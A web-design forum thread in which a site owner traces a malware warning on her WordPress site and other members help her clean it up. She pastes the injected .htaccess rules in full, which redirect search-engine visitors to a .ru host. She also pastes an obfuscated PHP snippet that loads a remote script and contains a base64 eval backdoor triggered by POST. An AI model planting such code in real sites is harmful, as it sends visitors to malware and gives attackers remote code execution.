Sitelock Alert

[Andrea]

Apparently, at some point I signed my site (see my footer link) up for some sitelock alert, and yesterday, I received a warning email.

 

We have detected a critical malware vulnerability at your site aandbwebdesign.com. This must be corrected within 72 hours in order to maintain your certification and continue to display the SiteLock security badge. Please access your SiteLock dashboard for more details.

 

From your dashboard, you can also take advantage of our Expert Services team to help you correct this issue.

Some of the issues were related to a straggle folder that I just deleted, but one warning remains, and I cannot find the source of the issue:

 

Page:http://www.aandbwebdesign.com?=Search&s=1Malware link:http://largeprovider.ru/evoce/index.php?=Search&s=

1Malware reported by:

Advisory provided by Google

If the link labeled "Malware Link" above is a link to an external website (not under your control), you should remove this link as it will send your visitors to a known malware site. If the link is on your site, though, you will need to apply to be removed from google's malware list. You may also click here to get help from our expert services team

 

But I cannot find the issue here - the link isn't really helpful (to me) - how can I find this russian intruder in my files?

[Andrea]

I'm stuck - somehow, laboratory-security.ru has has attached itself to my site, and I can't find where they are hiding. Most the site works fine, but when I hover over 'Blog", I see that link pop up.

 

When I log into my Wordpress admin and try to edit search.php, I get the "reported attach page" warning. But when I open search.php via Dramweaver, I see nothing out of the ordinary.

 

I have even copied all the files to my desktop and ran a dreamweaver search for laboratory - and nothing comes up.

 

Any hints anyone?

[falkencreative]

It's probably some sort of Javascript based attack. Have you checked for suspicious javascript includes in your main "index.php" file in the root of your site? I'm not seeing anything suspicious that I can spot thought.

[Andrea]

I looked for JavaScripts, but so far, haven't found any that look bad.

 

I assume that url should be in one of those files, but Dreamweaver didn't find anything.

 

What is odd is that at home this AM, when I hovered over 'Blog' in the nav bar, I saw the bad url appear in the bottom left. and when I clicked blog, it loaded the page without CSS.

 

Now here at work, I don't have either of these events occurring.

 

Too weird.

[newseed]

I looked for JavaScripts, but so far, haven't found any that look bad.

 

I assume that url should be in one of those files, but Dreamweaver didn't find anything.

 

What is odd is that at home this AM, when I hovered over 'Blog' in the nav bar, I saw the bad url appear in the bottom left. and when I clicked blog, it loaded the page without CSS.

 

Now here at work, I don't have either of these events occurring.

 

Too weird.

I don't suppose this would have something to do with the wpadmin folder files because (and I am assuming here) you probably don't log in to your site at work but you do at home.

[Andrea]

I don't know - I noticed that URL when I viewed the site in the browser, but I was logged into admin in another tab....

 

What I also don't understand is that the compromised link that alert gave me is related to the search function - and it's search.php that gets blocked when I try to open it via wp-admin. But when I open it via Dreamweaver, I see nothing suspicious.

 

Of course, I could pay that alert site $60 for help with this problem, but I really don't want to.

[newseed]

If you didn't do any customization in the wpadmin files such as search.php then why don't you just reupload the original file(s) and see what happens.

[Andrea]

Good point - I'll do that. At least it'll rule out those and maybe even fix the issue.

[Andrea]

I found it! Those dirty, rotten sons of a bitches!!!! They put it in my .htaccess. But I'm not totally sure what all to delete: --- Actually, I'm taking it all out. Please let me know if part of this actually belongs.

 

Also,, - how do they get into my .htaccess???

 

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress
ErrorDocument 400 http://spark-plastic.ru/open/index.php																														
ErrorDocument 401 http://spark-plastic.ru/open/index.php																														
ErrorDocument 403 http://spark-plastic.ru/open/index.php																														
 ErrorDocument 404 http://spark-plastic.ru/open/index.php																														
ErrorDocument 500 http://spark-plastic.ru/open/index.php																														
<IfModule mod_rewrite.c>																														
 RewriteEngine On																														
 RewriteCond %{HTTP_REFERER} .*google.* [OR]																														
RewriteCond %{HTTP_REFERER} .*ask.* [OR]																														
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*baidu.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*youtube.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*qq.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*excite.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*altavista.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*msn.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*netscape.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*aol.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*goto.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*mamma.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*lycos.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*search.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*bing.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*facebook.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*twitter.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*blog.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*live.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*myspace.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*mail.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*yandex.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*rambler.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*ya.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*aport.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]																														
																													RewriteCond %{HTTP_REFERER} .*flickr.*																														
																													RewriteRule ^(.*)$ http://spark-plastic.ru/open/index.php [R=301,L]																														
																													</IfModule>	

[falkencreative]

Take out everything after the "# END WordPress" line. Everything before that line is valid and needed by Wordpress.

 

I can't really say how they got access... it's possible they got access to the server your site is hosted on, not just your specific account, and added that code to all .htaccess files that they could find.

[Andrea]

This is getting ridiculous - what in the world is going on.

 

So I come home, ready to put the part back into my htaccess that I should have left there (thanks, Ben) when I have another email from the sitelock place about a whole new page that's defective.

Click at own risk, but they report:

http://www.aandbwebdesign.com/th1s_1s_a_4o4.html the strange thing is, I do not see this file in any of my online directories. Sitelock reports that the malware link is (again, click at own risk)

 

http://masaskisoft.in/ahalai/index.php - so I'm looking through my files and this seems to be in the top of several files (index.php for example):

  <?php                                                                                                                                                                               	global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

I don't really understand it, but I do know that turn it up now has NOTHING to do with me or my site.

 

What in the world is happening???

[falkencreative]

I'm assuming you've already changed all of your hosting related usernames/passwords? Sounds like this is something you'd better talk to your hosting about. Maybe the server you are hosting your site on has security issues?

[Andrea]

that's the thing - my computer crashed last weekend and I bought a new one, and in the process of recovering stuff and getting things back, I just changed the password a couple days ago - and it' s a good one.

 

But I'm in chat with the host right now - this is too weird. Thanks for your help.